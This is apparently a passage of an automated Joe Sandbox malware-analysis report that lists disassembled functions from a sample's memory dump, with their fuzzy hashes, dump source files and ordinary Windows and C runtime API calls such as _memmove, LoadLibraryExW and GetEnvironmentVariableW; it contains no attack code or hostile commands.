                                              • Instruction ID: 6545c48583efcec9d96dcf4b13259dddb6fcff76ba3544974385dbd64bcd05d9
                                              • Opcode Fuzzy Hash: 6a147df61c06feb2f988bce1bd7b72282e4cc01aee30b292d6d11e3eea965748
                                              • Instruction Fuzzy Hash: E4B09231000208BBDB012F11DC0A8893F29FB00AD1F004020FC0448032DB72AAD2DA80
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: LoadString$__swprintf
                                              • String ID:
                                              • API String ID: 207118244-0
                                              • Opcode ID: 6b57b476cd474a6dadc319700cb6053408d12f9dbf2120a903efbcedc24ce71a
                                              • Instruction ID: 4c81826acb33edca41e52889c013af46f34487ce69da2e590453c673c7534519
                                              • Opcode Fuzzy Hash: 6b57b476cd474a6dadc319700cb6053408d12f9dbf2120a903efbcedc24ce71a
                                              • Instruction Fuzzy Hash: 81B13B75A0010AEFDF14DF98C891DEEB7B5FF49310F11811AF915AB292DB70AA41CB90
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8ca90573dbdc92e5c9a5cc6ec5feeb3c1a10bbad88b7a8e14aefd74e9613430
                                              • Instruction ID: f936860ceec75ae78c0209cc06cb7c3ea562bf5f5ee81bad98d1e8d2d748e0c8
                                              • Opcode Fuzzy Hash: d8ca90573dbdc92e5c9a5cc6ec5feeb3c1a10bbad88b7a8e14aefd74e9613430
                                              • Instruction Fuzzy Hash: 5261BE70B002069FCB21DF54C881BBEB7E9EF46310F15816EE85A9B292DB75ED81CB51
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 544c0db461fe5687d1b22e364178f0e94cce9633798dc6ef396c6fb350ef1d63
                                              • Instruction ID: 96624552e0a9041cf6cddac8952dd7edcd0b089ec463966d40fa7ad25d665d37
                                              • Opcode Fuzzy Hash: 544c0db461fe5687d1b22e364178f0e94cce9633798dc6ef396c6fb350ef1d63
                                              • Instruction Fuzzy Hash: E231A1B9604A02DFC724DF18D490AA6F7E4FF48360714D579E98A8B791D730ED81CB98
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: 77b65a90597178e80e858ab04555eda6b1da9d15d0e3492bfea58f790a424be1
                                              • Instruction ID: 5dc1bb93acf61db9c4bf387afeb11156d1773b25ffefecda81af795d5346b310
                                              • Opcode Fuzzy Hash: 77b65a90597178e80e858ab04555eda6b1da9d15d0e3492bfea58f790a424be1
                                              • Instruction Fuzzy Hash: 6D412774508351DFDB65CF14C488B5ABBE5BF45318F0988ACE88A8B362C376E885CB52
                                              APIs
                                                • Part of subcall function 00044B29: FreeLibrary.KERNEL32(00000000,?), ref: 00044B63
                                                • Part of subcall function 0005547B: __wfsopen.LIBCMT ref: 00055486
                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,000427AF,?,00000001), ref: 000449F4
                                                • Part of subcall function 00044ADE: FreeLibrary.KERNEL32(00000000), ref: 00044B18
                                                • Part of subcall function 000448B0: _memmove.LIBCMT ref: 000448FA
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Library$Free$Load__wfsopen_memmove
                                              • String ID:
                                              • API String ID: 1396898556-0
                                              • Opcode ID: 42ce6de6ce28cdf7c922f7b9c90a096f096342006ce310933424acace3c64ac5
                                              • Instruction ID: 2e0160f4bb14e920f4abbe7b7fed94152805cb1ba3cff7a7b5d8b1d320fb3020
                                              • Opcode Fuzzy Hash: 42ce6de6ce28cdf7c922f7b9c90a096f096342006ce310933424acace3c64ac5
                                              • Instruction Fuzzy Hash: 54112772650205ABDB10FB70CC06FEE73A9EF40701F10443DF581A6183EFB09A24A799
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 2c79761423f540672bda14eb4514d80e2afe8b87cb0e6c2e844ebd02b31338ab
                                              • Instruction ID: 32c149c2c7e882461bab35b046510287a7a122b37378a28663d97dad0e33bcbf
                                              • Opcode Fuzzy Hash: 2c79761423f540672bda14eb4514d80e2afe8b87cb0e6c2e844ebd02b31338ab
                                              • Instruction Fuzzy Hash: 59114FB5604601DFC724CF28D581996B7E9FF49350720883EE88ACB661E732E881CB54
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: 183afe21c0e71b84afcc3e6a3e92c0009a246a76e1e0909f1455f5e5063dfb8f
                                              • Instruction ID: 5b106a5db119f111591e69be8e2de0486f3cb155e5bf21e634614a783c30af23
                                              • Opcode Fuzzy Hash: 183afe21c0e71b84afcc3e6a3e92c0009a246a76e1e0909f1455f5e5063dfb8f
                                              • Instruction Fuzzy Hash: 002102B4508341DFDB65DF54C444B5BBBE5BF84304F058968F88A57362C732E849CB92
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 0006F3E2
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Window
                                              • String ID:
                                              • API String ID: 2353593579-0
                                              • Opcode ID: 40bed227c2ccd0498dcee28998da5f67dd050d82b8711b1663ff08f242c69deb
                                              • Instruction ID: e1d21472ea9cbbb47a73e1772d9d13f33f0ef3ab96bf3ac071431e988e46369f
                                              • Opcode Fuzzy Hash: 40bed227c2ccd0498dcee28998da5f67dd050d82b8711b1663ff08f242c69deb
                                              • Instruction Fuzzy Hash: EE118E71700516BEDB4AAB71C880AFEB7ACFF45344F004126F829D2112DB20AE25C7E0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                              • Instruction ID: 50752e130e86861d8bb616476dd9fc14a0062175f32a0d772f427388bf94a45c
                                              • Opcode Fuzzy Hash: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                              • Instruction Fuzzy Hash: E401D6B22117016ED3245B38D802BABBB98DF447A0F10893AF91ACA1D2EA71E4948794
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 0395b2a835dbff9dd1549838c9731aea477c68174e31b915e9f67382827cc5ea
                                              • Instruction ID: 8601de3e7660e9863181b985899d074b82f186f97ab91176be11603fe8e30ca8
                                              • Opcode Fuzzy Hash: 0395b2a835dbff9dd1549838c9731aea477c68174e31b915e9f67382827cc5ea
                                              • Instruction Fuzzy Hash: 5D01D6322002156BCB14DF2DC8919BFB7A9EF86354714843EF90ACB246E631E801C790
                                              APIs
                                              • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 000A4998
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: EnvironmentVariable
                                              • String ID:
                                              • API String ID: 1431749950-0
                                              • Opcode ID: 3a052f5b4b29722facd64a7ee3877c6bb50034b6c4c0ed2fd8739867a9eff0de
                                              • Instruction ID: 5dcbd8d1cc6f211ead6a9d24d6449de607dc54db80712274b96a6d91afffca78
                                              • Opcode Fuzzy Hash: 3a052f5b4b29722facd64a7ee3877c6bb50034b6c4c0ed2fd8739867a9eff0de
                                              • Instruction Fuzzy Hash: D1F03135608204AFDB14EF65D846DDF77BCEF45720B004455F8089B2A2DE70BD45CB51
                                              APIs
                                                • Part of subcall function 00050FE6: std::exception::exception.LIBCMT ref: 0005101C
                                                • Part of subcall function 00050FE6: __CxxThrowException@8.LIBCMT ref: 00051031
                                              • _memset.LIBCMT ref: 00097CB4
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw_memsetstd::exception::exception
                                              • String ID:
                                              • API String ID: 525207782-0
                                              • Opcode ID: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
                                              • Instruction ID: 53c8b9a60399cf549a029a4095c6b88c010e3a62f04f0f7f3ba4bbfd98000004
                                              • Opcode Fuzzy Hash: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
                                              • Instruction Fuzzy Hash: C501F6752042009FD361EF5CD941F4ABBE5AF59310F24846AF9888B3A2DB72E800DB90
                                              APIs
                                                • Part of subcall function 00050FE6: std::exception::exception.LIBCMT ref: 0005101C
                                                • Part of subcall function 00050FE6: __CxxThrowException@8.LIBCMT ref: 00051031
                                              • _memmove.LIBCMT ref: 0006DC8B
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw_memmovestd::exception::exception
                                              • String ID:
                                              • API String ID: 1602317333-0
                                              • Opcode ID: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                              • Instruction ID: 98cafcae8939157b40112e8fe0c5c6ade36034a847b9b7d857f8ccf106c3cef6
                                              • Opcode Fuzzy Hash: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                              • Instruction Fuzzy Hash: 2FF0F974604101DFD761DF68C981E5ABBE5BF1A300F2484ACE5898F3A2E772E815CF91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _fseek
                                              • String ID:
                                              • API String ID: 2937370855-0
                                              • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                              • Instruction ID: 6ede6df026839d40077518be2d7fdd10a4766b4161d992a584d1ce512dcab3ca
                                              • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                              • Instruction Fuzzy Hash: D7F085B6800208BFDF109F84DC00DEFBBB9EB89320F044198F9045A211D232EA25CBA1
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,?,000427AF,?,00000001), ref: 00044A63
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: 45efe9c1fa5436591180920e27f724aa13eba7dcb7f88fec23d7b177a29be5c2
                                              • Instruction ID: 0bdbba8246e558974a4ceca23431b9d95c1bab7ebc418cc8928c558050fcad2f
                                              • Opcode Fuzzy Hash: 45efe9c1fa5436591180920e27f724aa13eba7dcb7f88fec23d7b177a29be5c2
                                              • Instruction Fuzzy Hash: F4F039B1145701CFCB749F64E8A091ABBF0BF14326324893EE5D783611C771A994DF49
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                              • Instruction ID: 9f5f1c9f7452ce4170da410b973b2985ca864cd13e88c7807593cc7512f1271e
                                              • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                              • Instruction Fuzzy Hash: 2FF058B240020DFFDF04CF80C941EAABB79FB04314F208189FC188A212D332EA21AB91
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000509E4
                                                • Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: LongNamePath_memmove
                                              • String ID:
                                              • API String ID: 2514874351-0
                                              • Opcode ID: f0432406ba4c779e260e5394cb1bbe80e9e842981837e7d440ff7371d51ae3a1
                                              • Instruction ID: 9fa53b6fc5e0d61386715acbdd3457fb0494fb9973de750068369ef67b0987fa
                                              • Opcode Fuzzy Hash: f0432406ba4c779e260e5394cb1bbe80e9e842981837e7d440ff7371d51ae3a1
                                              • Instruction Fuzzy Hash: 3DE0863290012857C72196989C05FEA77DDDBC9690F0401B6FC08D7245DA659D818691
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00093BFE), ref: 00094FED
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 39018efbf8943aad0cb1822f9a67ecdb3ef55eb587cae48967da8851f041162c
                                              • Instruction ID: 4e8e209659690aa830f3f845f8fdb19d365dd5349bd480d2e6b0b3f19e14232f
                                              • Opcode Fuzzy Hash: 39018efbf8943aad0cb1822f9a67ecdb3ef55eb587cae48967da8851f041162c
                                              • Instruction Fuzzy Hash: 30B0923400060296ADA81F3C196889933815A423A97D81BD1E878854E1D239884FF520
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: __wfsopen
                                              • String ID:
                                              • API String ID: 197181222-0
                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction ID: 59e91f2554274461db4a06e0da98eed31d83cde9f1361c5ee5c9cb15492be4df
                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction Fuzzy Hash: 2DB0927644020C77CE012A82EC03AAA3B299B4066AF408020FF0C1C162A673A6A49A89
                                              APIs
                                              • _doexit.LIBCMT ref: 00053592
                                                • Part of subcall function 00053459: __lock.LIBCMT ref: 00053467
                                                • Part of subcall function 00053459: DecodePointer.KERNEL32(000ECB70,0000001C,000533B2,00051003,00000001,00000000,?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534A6
                                                • Part of subcall function 00053459: DecodePointer.KERNEL32(?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534B7
                                                • Part of subcall function 00053459: EncodePointer.KERNEL32(00000000,?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534D0
                                                • Part of subcall function 00053459: DecodePointer.KERNEL32(-00000004,?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534E0
                                                • Part of subcall function 00053459: EncodePointer.KERNEL32(00000000,?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534E6
                                                • Part of subcall function 00053459: DecodePointer.KERNEL32(?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534FC
                                                • Part of subcall function 00053459: DecodePointer.KERNEL32(?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 00053507
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
